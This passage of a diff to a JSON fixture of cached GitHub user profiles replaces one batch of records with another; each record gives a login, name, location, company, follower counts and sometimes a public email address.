"https://avatars.githubusercontent.com/u/1053658?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-10-21T06:59:51Z", - "updated_at": "2022-10-21T06:59:51Z", - "node_id": "U_kgDOBu8wfg", + "following_count": 1, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2011-09-15T16:29:32Z", + "updated_at": "2024-06-28T16:43:30Z", + "node_id": "MDQ6VXNlcjEwNTM2NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425753,74 +685277,74 @@ }, { "model": "github.user", - "pk": 2621, + "pk": 7975, "fields": { - "nest_created_at": "2024-09-12T01:36:19.067Z", - "nest_updated_at": "2024-09-12T01:36:19.067Z", - "name": "", - "login": "yuri-kolesov", + "nest_created_at": "2024-09-22T09:38:16.624Z", + "nest_updated_at": "2024-09-22T19:37:18.616Z", + "name": "Joshua Kehn", + "login": "joshkehn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117815099?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/272377?v=4", + "company": "@kehninc ", + "location": "New York, New York", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-11-09T09:11:29Z", - "updated_at": "2023-12-21T13:31:25Z", - "node_id": "U_kgDOBwW3Ow", + "following_count": 4, + "followers_count": 71, + "public_gists_count": 70, + "public_repositories_count": 59, + "created_at": "2010-05-10T13:46:19Z", + "updated_at": "2024-07-09T16:19:40Z", + "node_id": "MDQ6VXNlcjI3MjM3Nw==", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "joshkehn" } }, { "model": "github.user", - "pk": 2622, + "pk": 7976, "fields": { - "nest_created_at": "2024-09-12T01:36:20.738Z", - "nest_updated_at": "2024-09-12T01:36:20.738Z", - "name": "Lumír Jasiok", - "login": "jas02", - "email": "lumir.jasiok@alfawolf.eu", - "avatar_url": "https://avatars.githubusercontent.com/u/1891408?v=4", + "nest_created_at": "2024-09-22T09:38:16.946Z", + "nest_updated_at": "2024-09-22T19:37:18.928Z", + "name": "Vladislav Knopach", + "login": "Novarg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139215?v=4", "company": "", - "location": "Czech Republic", + "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 4, - "public_gists_count": 24, - "public_repositories_count": 40, - "created_at": "2012-06-25T20:40:34Z", - "updated_at": "2024-08-18T11:21:16Z", - "node_id": "MDQ6VXNlcjE4OTE0MDg=", + "followers_count": 3, + "public_gists_count": 5, + "public_repositories_count": 14, + "created_at": "2009-10-13T15:18:59Z", + "updated_at": "2024-08-29T14:09:36Z", + "node_id": "MDQ6VXNlcjEzOTIxNQ==", "bio": "", "is_hireable": false, - "twitter_username": "LumirJasiok" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2623, + "pk": 7977, "fields": { - "nest_created_at": "2024-09-12T01:36:23.669Z", - "nest_updated_at": "2024-09-12T01:36:23.669Z", - "name": "Sebastian Sommer", - "login": "sosnet", + "nest_created_at": "2024-09-22T09:38:17.257Z", + "nest_updated_at": "2024-09-22T19:37:19.253Z", + "name": "David Miller", + "login": "davidmiller", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/945587?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17229?v=4", "company": "", - "location": "Graz - Austria", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2011-07-28T23:36:22Z", - "updated_at": "2024-03-29T11:08:07Z", - "node_id": "MDQ6VXNlcjk0NTU4Nw==", + "following_count": 8, + "followers_count": 95, + "public_gists_count": 9, + "public_repositories_count": 150, + "created_at": "2008-07-16T12:33:38Z", + "updated_at": "2024-02-12T16:10:22Z", + "node_id": "MDQ6VXNlcjE3MjI5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425828,24 +685352,49 @@ }, { "model": "github.user", - "pk": 2624, + "pk": 7978, "fields": { - "nest_created_at": "2024-09-12T01:36:25.360Z", - "nest_updated_at": "2024-09-18T00:18:15.937Z", - "name": "oers", - "login": "oers", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1115563?v=4", - "company": "EBP Deutschland GmbH", - "location": "Berlin", + "nest_created_at": "2024-09-22T09:38:17.588Z", + "nest_updated_at": "2024-09-22T19:37:19.571Z", + "name": "David Wolever", + "login": "wolever", + "email": "david@wolever.net", + "avatar_url": "https://avatars.githubusercontent.com/u/59575?v=4", + "company": "RxFood Corp", + "location": "Toronto, ON", "collaborators_count": 0, - "following_count": 4, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2011-10-10T06:47:37Z", - "updated_at": "2024-09-17T17:06:57Z", - "node_id": "MDQ6VXNlcjExMTU1NjM=", + "following_count": 17, + "followers_count": 414, + "public_gists_count": 140, + "public_repositories_count": 116, + "created_at": "2009-03-03T03:28:14Z", + "updated_at": "2024-08-30T19:22:17Z", + "node_id": "MDQ6VXNlcjU5NTc1", + "bio": "", + "is_hireable": false, + "twitter_username": "wolever" + } +}, +{ + "model": "github.user", + "pk": 7979, + "fields": { + "nest_created_at": "2024-09-22T09:38:17.915Z", + "nest_updated_at": "2024-09-22T19:37:19.880Z", + "name": "Stefan Wehrmeyer", + "login": "stefanw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78356?v=4", + "company": "", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 487, + "public_gists_count": 19, + "public_repositories_count": 161, + "created_at": "2009-04-27T14:29:16Z", + "updated_at": "2024-09-17T14:16:10Z", + "node_id": "MDQ6VXNlcjc4MzU2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425853,49 +685402,49 @@ }, { "model": "github.user", - "pk": 2625, + "pk": 7980, "fields": { - "nest_created_at": "2024-09-12T01:36:29.045Z", - "nest_updated_at": "2024-09-12T01:36:29.045Z", - "name": "", - "login": "whiteninja76", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34644528?v=4", + "nest_created_at": "2024-09-22T09:38:18.281Z", + "nest_updated_at": "2024-09-22T19:37:20.208Z", + "name": "Willem", + "login": "willemt", + "email": "himself@willemthiart.com", + "avatar_url": "https://avatars.githubusercontent.com/u/946878?v=4", "company": "", - "location": "", + "location": "Wellington", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2017-12-18T08:36:20Z", - "updated_at": "2024-07-31T09:43:44Z", - "node_id": "MDQ6VXNlcjM0NjQ0NTI4", + "following_count": 82, + "followers_count": 315, + "public_gists_count": 8, + "public_repositories_count": 101, + "created_at": "2011-07-29T14:20:41Z", + "updated_at": "2024-08-26T00:41:02Z", + "node_id": "MDQ6VXNlcjk0Njg3OA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2626, + "pk": 7981, "fields": { - "nest_created_at": "2024-09-12T01:36:32.509Z", - "nest_updated_at": "2024-09-16T22:28:56.103Z", - "name": "", - "login": "mwilfried", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32105900?v=4", + "nest_created_at": "2024-09-22T09:38:18.591Z", + "nest_updated_at": "2024-09-22T19:37:20.530Z", + "name": "Jan Kroeze", + "login": "fluffels", + "email": "jcwkroeze@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/2345151?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-09-19T16:48:03Z", - "updated_at": "2023-04-06T10:26:58Z", - "node_id": "MDQ6VXNlcjMyMTA1OTAw", + "following_count": 12, + "followers_count": 12, + "public_gists_count": 8, + "public_repositories_count": 84, + "created_at": "2012-09-14T07:41:35Z", + "updated_at": "2024-09-19T23:16:56Z", + "node_id": "MDQ6VXNlcjIzNDUxNTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425903,24 +685452,24 @@ }, { "model": "github.user", - "pk": 2627, + "pk": 7982, "fields": { - "nest_created_at": "2024-09-12T01:36:43.211Z", - "nest_updated_at": "2024-09-12T01:36:43.211Z", - "name": "Михаил Красильников", - "login": "mekras", - "email": "m.krasilnikov@yandex.ru", - "avatar_url": "https://avatars.githubusercontent.com/u/192067?v=4", - "company": "@dobrosite ", - "location": "Россия, Московская область, Долгопрудный", + "nest_created_at": "2024-09-22T09:38:18.895Z", + "nest_updated_at": "2024-09-22T19:37:20.848Z", + "name": "Alex Weiss", + "login": "algrs", + "email": "algrs@cacography.net", + "avatar_url": "https://avatars.githubusercontent.com/u/188884?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 15, + "followers_count": 7, "public_gists_count": 3, - "public_repositories_count": 26, - "created_at": "2010-01-29T05:41:55Z", - "updated_at": "2024-08-14T08:31:19Z", - "node_id": "MDQ6VXNlcjE5MjA2Nw==", + "public_repositories_count": 12, + "created_at": "2010-01-24T15:58:12Z", + "updated_at": "2024-04-06T14:38:13Z", + "node_id": "MDQ6VXNlcjE4ODg4NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425928,24 +685477,24 @@ }, { "model": "github.user", - "pk": 2628, + "pk": 7983, "fields": { - "nest_created_at": "2024-09-12T01:36:45.740Z", - "nest_updated_at": "2024-09-12T01:36:45.741Z", - "name": "", - "login": "ellipse2v", + "nest_created_at": "2024-09-22T09:38:19.205Z", + "nest_updated_at": "2024-09-22T19:37:21.166Z", + "name": "Fred Palmer", + "login": "fredpalmer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45236751?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32422?v=4", + "company": "CTO @artistgrowth ", + "location": "Nashville, TN", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-11-21T14:50:03Z", - "updated_at": "2024-09-05T18:02:55Z", - "node_id": "MDQ6VXNlcjQ1MjM2NzUx", + "following_count": 40, + "followers_count": 28, + "public_gists_count": 5, + "public_repositories_count": 47, + "created_at": "2008-11-03T14:59:11Z", + "updated_at": "2024-08-01T14:16:37Z", + "node_id": "MDQ6VXNlcjMyNDIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425953,124 +685502,149 @@ }, { "model": "github.user", - "pk": 2629, + "pk": 7984, "fields": { - "nest_created_at": "2024-09-12T01:36:46.990Z", - "nest_updated_at": "2024-09-12T01:36:46.990Z", - "name": "Elliot Segler", - "login": "elliotsegler", + "nest_created_at": "2024-09-22T09:38:19.517Z", + "nest_updated_at": "2024-09-22T19:37:21.540Z", + "name": "Henning Groß", + "login": "hgross", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/361995?v=4", - "company": "@akkodis-aws", - "location": "Perth, AU", + "avatar_url": "https://avatars.githubusercontent.com/u/810276?v=4", + "company": "Zühlke Engineering GmbH", + "location": "Mainz", "collaborators_count": 0, - "following_count": 16, - "followers_count": 4, - "public_gists_count": 2, - "public_repositories_count": 60, - "created_at": "2010-08-12T10:16:17Z", - "updated_at": "2024-08-09T05:53:54Z", - "node_id": "MDQ6VXNlcjM2MTk5NQ==", - "bio": "Cloud guy @Akkodis ", + "following_count": 43, + "followers_count": 21, + "public_gists_count": 10, + "public_repositories_count": 31, + "created_at": "2011-05-25T16:42:46Z", + "updated_at": "2024-09-20T20:51:59Z", + "node_id": "MDQ6VXNlcjgxMDI3Ng==", + "bio": "Principal Software Architect @ Zühlke Engineering - \r\n\r\nEnthusiastic about software, hardware, 3D printing and sim racing.", "is_hireable": false, - "twitter_username": "elliotsegler" + "twitter_username": "h_gross" } }, { "model": "github.user", - "pk": 2630, + "pk": 7985, "fields": { - "nest_created_at": "2024-09-12T01:36:48.276Z", - "nest_updated_at": "2024-09-16T22:28:57.114Z", - "name": "", - "login": "securityguru", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7437404?v=4", + "nest_created_at": "2024-09-22T09:38:19.832Z", + "nest_updated_at": "2024-09-22T19:37:21.851Z", + "name": "Jim Lyndon", + "login": "jimlyndon", + "email": "jimlyndon@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1093610?v=4", "company": "", - "location": "", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2014-04-29T08:22:51Z", - "updated_at": "2022-11-01T14:27:36Z", - "node_id": "MDQ6VXNlcjc0Mzc0MDQ=", + "following_count": 45, + "followers_count": 23, + "public_gists_count": 3, + "public_repositories_count": 55, + "created_at": "2011-09-30T20:02:42Z", + "updated_at": "2023-06-28T18:39:32Z", + "node_id": "MDQ6VXNlcjEwOTM2MTA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2631, + "pk": 7986, "fields": { - "nest_created_at": "2024-09-12T01:36:52.404Z", - "nest_updated_at": "2024-09-12T01:36:52.404Z", - "name": "Marjan Bugarinovic", - "login": "alternaivan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25727477?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:38:20.152Z", + "nest_updated_at": "2024-09-22T19:37:22.158Z", + "name": "Marcelo Jorge Vieira", + "login": "marcelometal", + "email": "metal@alucinados.com", + "avatar_url": "https://avatars.githubusercontent.com/u/665903?v=4", + "company": "movimente.me", + "location": "Brasil, MG, Belo Horizonte", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2017-02-12T19:22:32Z", - "updated_at": "2024-07-24T06:42:32Z", - "node_id": "MDQ6VXNlcjI1NzI3NDc3", - "bio": "", + "following_count": 33, + "followers_count": 165, + "public_gists_count": 9, + "public_repositories_count": 159, + "created_at": "2011-03-12T16:57:33Z", + "updated_at": "2024-09-10T21:25:57Z", + "node_id": "MDQ6VXNlcjY2NTkwMw==", + "bio": "\r\n free software developer, debian developer\r\n", "is_hireable": false, + "twitter_username": "marcelometal" + } +}, +{ + "model": "github.user", + "pk": 7987, + "fields": { + "nest_created_at": "2024-09-22T09:38:20.777Z", + "nest_updated_at": "2024-09-22T19:37:22.784Z", + "name": "Tim Kleinschmidt", + "login": "Azd325", + "email": "tim.kleinschmidt@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/426541?v=4", + "company": "machtfit", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 46, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2010-10-04T13:58:54Z", + "updated_at": "2024-07-30T07:16:18Z", + "node_id": "MDQ6VXNlcjQyNjU0MQ==", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2632, + "pk": 7988, "fields": { - "nest_created_at": "2024-09-12T01:36:56.723Z", - "nest_updated_at": "2024-09-12T01:36:56.723Z", - "name": "herbert", - "login": "gruselglatz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15243394?v=4", + "nest_created_at": "2024-09-22T09:38:28.355Z", + "nest_updated_at": "2024-09-22T19:37:30.152Z", + "name": "Dev Tyagi", + "login": "Dtyagi-9", + "email": "devtg3@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/37764158?v=4", "company": "", - "location": "", + "location": "Noida, Uttar Pradesh, INDIA", "collaborators_count": 0, - "following_count": 8, - "followers_count": 2, + "following_count": 17, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2015-10-22T06:17:55Z", - "updated_at": "2024-03-11T18:31:57Z", - "node_id": "MDQ6VXNlcjE1MjQzMzk0", - "bio": "", - "is_hireable": false, + "public_repositories_count": 50, + "created_at": "2018-03-25T05:11:43Z", + "updated_at": "2022-08-13T08:44:11Z", + "node_id": "MDQ6VXNlcjM3NzY0MTU4", + "bio": "Full Stack Developer MERN stack| Geo-spacial Analysis | ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2633, + "pk": 7989, "fields": { - "nest_created_at": "2024-09-12T01:36:58.804Z", - "nest_updated_at": "2024-09-12T01:36:58.804Z", - "name": "Aksel Allas", - "login": "AkselAllas", + "nest_created_at": "2024-09-22T09:38:31.970Z", + "nest_updated_at": "2024-09-22T19:37:33.773Z", + "name": "", + "login": "zorianix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26136082?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13693079?v=4", "company": "", - "location": "Estonia", + "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 21, - "created_at": "2017-03-02T08:56:47Z", - "updated_at": "2024-06-25T07:29:51Z", - "node_id": "MDQ6VXNlcjI2MTM2MDgy", + "following_count": 13, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2015-08-07T10:17:27Z", + "updated_at": "2024-09-22T11:41:10Z", + "node_id": "MDQ6VXNlcjEzNjkzMDc5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426078,24 +685652,24 @@ }, { "model": "github.user", - "pk": 2634, + "pk": 7990, "fields": { - "nest_created_at": "2024-09-12T01:37:00.921Z", - "nest_updated_at": "2024-09-12T01:37:00.921Z", + "nest_created_at": "2024-09-22T09:38:32.306Z", + "nest_updated_at": "2024-09-22T19:37:34.111Z", "name": "", - "login": "straimtheone", + "login": "tahir59", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20614638?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/52169987?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-07-23T15:51:57Z", - "updated_at": "2024-09-10T13:52:44Z", - "node_id": "MDQ6VXNlcjIwNjE0NjM4", + "public_repositories_count": 8, + "created_at": "2019-06-24T15:28:55Z", + "updated_at": "2022-10-31T06:15:38Z", + "node_id": "MDQ6VXNlcjUyMTY5OTg3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426103,24 +685677,24 @@ }, { "model": "github.user", - "pk": 2635, + "pk": 7991, "fields": { - "nest_created_at": "2024-09-12T01:37:04.261Z", - "nest_updated_at": "2024-09-12T01:39:43.096Z", - "name": "Ronald", - "login": "black-snow", + "nest_created_at": "2024-09-22T09:38:32.927Z", + "nest_updated_at": "2024-09-22T19:37:34.746Z", + "name": "Matthew Verive", + "login": "immewnity", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/579733?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3454676?v=4", "company": "", - "location": "Berlin", + "location": "", "collaborators_count": 0, "following_count": 6, - "followers_count": 19, - "public_gists_count": 6, - "public_repositories_count": 18, - "created_at": "2011-01-23T21:38:57Z", - "updated_at": "2024-05-28T20:09:05Z", - "node_id": "MDQ6VXNlcjU3OTczMw==", + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 4, + "created_at": "2013-02-02T04:52:45Z", + "updated_at": "2024-09-03T20:26:41Z", + "node_id": "MDQ6VXNlcjM0NTQ2NzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426128,74 +685702,74 @@ }, { "model": "github.user", - "pk": 2636, + "pk": 7992, "fields": { - "nest_created_at": "2024-09-12T01:37:05.731Z", - "nest_updated_at": "2024-09-12T01:37:05.731Z", + "nest_created_at": "2024-09-22T09:38:33.242Z", + "nest_updated_at": "2024-09-22T19:37:35.055Z", "name": "", - "login": "Aster-Lin", + "login": "gwario", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152589565?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2676790?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-12-01T06:29:56Z", - "updated_at": "2024-06-13T01:30:41Z", - "node_id": "U_kgDOCRhU_Q", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 6, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 34, + "created_at": "2012-10-29T16:28:00Z", + "updated_at": "2024-07-20T09:43:50Z", + "node_id": "MDQ6VXNlcjI2NzY3OTA=", + "bio": "Angular * AI * Android * Security", + "is_hireable": true, + "twitter_username": "gwariowastaken" } }, { "model": "github.user", - "pk": 2637, + "pk": 7993, "fields": { - "nest_created_at": "2024-09-12T01:37:15.518Z", - "nest_updated_at": "2024-09-12T01:39:53.963Z", - "name": "Attila Kocsis", - "login": "tsimas", + "nest_created_at": "2024-09-22T09:38:33.865Z", + "nest_updated_at": "2024-09-22T19:37:35.687Z", + "name": "Kara de la Marck", + "login": "MarckK", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1420075?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15032115?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 62, + "followers_count": 78, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2012-02-08T15:58:16Z", - "updated_at": "2024-08-30T06:57:11Z", - "node_id": "MDQ6VXNlcjE0MjAwNzU=", + "public_repositories_count": 166, + "created_at": "2015-10-08T12:07:40Z", + "updated_at": "2024-08-15T19:17:13Z", + "node_id": "MDQ6VXNlcjE1MDMyMTE1", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "KaraMarck" } }, { "model": "github.user", - "pk": 2638, + "pk": 7994, "fields": { - "nest_created_at": "2024-09-12T01:37:23.433Z", - "nest_updated_at": "2024-09-12T01:37:23.433Z", - "name": "Brent England", - "login": "brentos99", - "email": "brentos@freshfighter.net", - "avatar_url": "https://avatars.githubusercontent.com/u/12946723?v=4", + "nest_created_at": "2024-09-22T09:38:34.503Z", + "nest_updated_at": "2024-09-22T19:37:36.308Z", + "name": "catalinvr", + "login": "catalinvr", + "email": "catalinvr@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12939058?v=4", "company": "", - "location": "Queensland, Australia", + "location": "Brasov", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2015-06-18T04:48:10Z", - "updated_at": "2024-08-18T03:27:40Z", - "node_id": "MDQ6VXNlcjEyOTQ2NzIz", + "following_count": 9, + "followers_count": 2, + "public_gists_count": 6, + "public_repositories_count": 38, + "created_at": "2015-06-17T16:04:09Z", + "updated_at": "2023-11-30T21:51:05Z", + "node_id": "MDQ6VXNlcjEyOTM5MDU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426203,99 +685777,99 @@ }, { "model": "github.user", - "pk": 2639, + "pk": 7995, "fields": { - "nest_created_at": "2024-09-12T01:37:24.731Z", - "nest_updated_at": "2024-09-12T01:37:24.731Z", - "name": "", - "login": "ArtWachowski", + "nest_created_at": "2024-09-22T09:38:36.398Z", + "nest_updated_at": "2024-09-22T19:37:38.228Z", + "name": "Selçuk Mıynat", + "login": "miynat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47650079?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1431760?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2019-02-15T01:49:39Z", - "updated_at": "2024-09-06T09:33:38Z", - "node_id": "MDQ6VXNlcjQ3NjUwMDc5", + "following_count": 15, + "followers_count": 14, + "public_gists_count": 6, + "public_repositories_count": 19, + "created_at": "2012-02-12T22:43:13Z", + "updated_at": "2024-07-23T15:27:22Z", + "node_id": "MDQ6VXNlcjE0MzE3NjA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2640, + "pk": 7996, "fields": { - "nest_created_at": "2024-09-12T01:37:26.819Z", - "nest_updated_at": "2024-09-12T01:37:26.819Z", - "name": "", - "login": "mariotepro", + "nest_created_at": "2024-09-22T09:38:37.048Z", + "nest_updated_at": "2024-09-22T19:37:38.875Z", + "name": "Shreyansh Jain", + "login": "shreyansh23", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15969360?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32803230?v=4", + "company": "@goldmansachs @IMGIITRoorkee ", + "location": "IIT Roorkee", "collaborators_count": 0, - "following_count": 6, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2015-11-22T17:44:34Z", - "updated_at": "2024-08-12T22:20:39Z", - "node_id": "MDQ6VXNlcjE1OTY5MzYw", - "bio": "", + "following_count": 59, + "followers_count": 38, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2017-10-14T20:59:14Z", + "updated_at": "2024-08-27T15:10:53Z", + "node_id": "MDQ6VXNlcjMyODAzMjMw", + "bio": "Engineering Analyst at @goldmansachs", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2641, + "pk": 7997, "fields": { - "nest_created_at": "2024-09-12T01:37:29.782Z", - "nest_updated_at": "2024-09-12T01:37:29.782Z", - "name": "Estelle", - "login": "stl543", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23101824?v=4", + "nest_created_at": "2024-09-22T09:38:38.703Z", + "nest_updated_at": "2024-09-22T19:37:40.509Z", + "name": "Yanek Martinson", + "login": "yanekm", + "email": "yanekmartinson@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13263657?v=4", "company": "", - "location": "France", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-10-27T14:36:20Z", - "updated_at": "2024-07-08T07:45:54Z", - "node_id": "MDQ6VXNlcjIzMTAxODI0", - "bio": "", + "public_repositories_count": 6, + "created_at": "2015-07-09T22:48:44Z", + "updated_at": "2024-07-23T17:59:50Z", + "node_id": "MDQ6VXNlcjEzMjYzNjU3", + "bio": "Working on Application Security automation at Global Payments.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2642, + "pk": 7998, "fields": { - "nest_created_at": "2024-09-12T01:37:31.514Z", - "nest_updated_at": "2024-09-12T01:37:31.514Z", - "name": "", - "login": "bobro99", + "nest_created_at": "2024-09-22T09:38:39.334Z", + "nest_updated_at": "2024-09-22T19:37:41.144Z", + "name": "Jeff Boothby", + "login": "jeffboothby", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/160594711?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30808292?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-02-20T10:02:14Z", - "updated_at": "2024-08-17T12:38:22Z", - "node_id": "U_kgDOCZJ7Fw", + "public_repositories_count": 0, + "created_at": "2017-08-07T18:10:17Z", + "updated_at": "2023-05-02T16:00:13Z", + "node_id": "MDQ6VXNlcjMwODA4Mjky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426303,24 +685877,24 @@ }, { "model": "github.user", - "pk": 2643, + "pk": 7999, "fields": { - "nest_created_at": "2024-09-12T01:37:33.223Z", - "nest_updated_at": "2024-09-12T01:37:33.223Z", - "name": "Patrick Wang", - "login": "Firefox2100", + "nest_created_at": "2024-09-22T09:38:50.639Z", + "nest_updated_at": "2024-09-22T19:37:53.367Z", + "name": "Tayfun Sen", + "login": "tayfun", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39050699?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55836?v=4", "company": "", - "location": "Leicester, UK", + "location": "London", "collaborators_count": 0, - "following_count": 34, - "followers_count": 20, - "public_gists_count": 0, - "public_repositories_count": 44, - "created_at": "2018-05-07T09:41:36Z", - "updated_at": "2024-08-22T19:07:16Z", - "node_id": "MDQ6VXNlcjM5MDUwNjk5", + "following_count": 16, + "followers_count": 58, + "public_gists_count": 6, + "public_repositories_count": 34, + "created_at": "2009-02-19T09:51:07Z", + "updated_at": "2024-08-28T21:31:47Z", + "node_id": "MDQ6VXNlcjU1ODM2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426328,39 +685902,39 @@ }, { "model": "github.user", - "pk": 2644, + "pk": 8000, "fields": { - "nest_created_at": "2024-09-12T01:37:34.902Z", - "nest_updated_at": "2024-09-12T01:37:34.902Z", - "name": "Quentin Gosset", - "login": "quentingosset", - "email": "quentingosset7500@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6824137?v=4", - "company": "Infrabel", - "location": "Belgium", + "nest_created_at": "2024-09-22T09:39:11.237Z", + "nest_updated_at": "2024-09-22T19:38:13.565Z", + "name": "Dan Henry", + "login": "dhenrygithub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5933137?v=4", + "company": "", + "location": "New Orleans, LA", "collaborators_count": 0, - "following_count": 38, - "followers_count": 35, - "public_gists_count": 7, - "public_repositories_count": 35, - "created_at": "2014-03-01T11:58:47Z", - "updated_at": "2024-09-06T07:41:07Z", - "node_id": "MDQ6VXNlcjY4MjQxMzc=", - "bio": "Software developer, Hacker, Blockchain lover, ... \r\nNew technologies are my passion.", + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2013-11-13T20:47:06Z", + 